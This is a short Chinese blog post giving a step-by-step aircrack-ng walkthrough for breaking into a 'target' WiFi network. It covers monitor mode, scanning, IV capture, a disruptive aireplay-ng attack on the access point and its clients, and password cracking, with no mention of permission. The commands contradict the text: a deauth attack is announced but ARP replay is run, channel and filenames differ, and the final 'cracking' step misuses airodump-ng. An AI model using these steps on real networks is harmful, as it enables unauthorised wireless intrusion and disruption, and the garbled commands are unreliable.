标签:aircrack-ng
第一步所谓的开启网卡:airmon-ng wlan0 up,我测试半天,不管用,反正我的网卡已经启用了,无所谓了。
第二步:开启监听模式airmon-ng start wlan0,结果如下
如果你要是看不到monitor mode enabled这些字眼,就再启动一次,不要启动多次,启动多次会出现wlan0mon、 wlan0monmon、 wlan0monmonmon不知为啥那么多,为防止瞎了,所以干脆就出现一个wlan0mon
第三步:airodump-ng wlan0mon 探测我们要攻击的目标主机
主要我们要查看目标的通道ch多少,和前两个BSSID和STATION两个值到底多少。
第四步:airodump-ng --ivs -w longas -c 1 wlan0mon 开始抓包! 转包文件为当前文件夹下longas-01.ivs
#--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。
第五步:然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0
aireplay-ng -3 -b D8:24:BD:79:2A:9B -h 00:26:C7:79:9C:32 wlan0mon
第六步:破解密码
airodump-ng longas-01.ivs -w dic.txt
本文出自 “技术成就梦想” 博客,请务必保留此出处http://526869727.blog.51cto.com/2769621/1783856
标签:aircrack-ng
原文地址:http://526869727.blog.51cto.com/2769621/1783856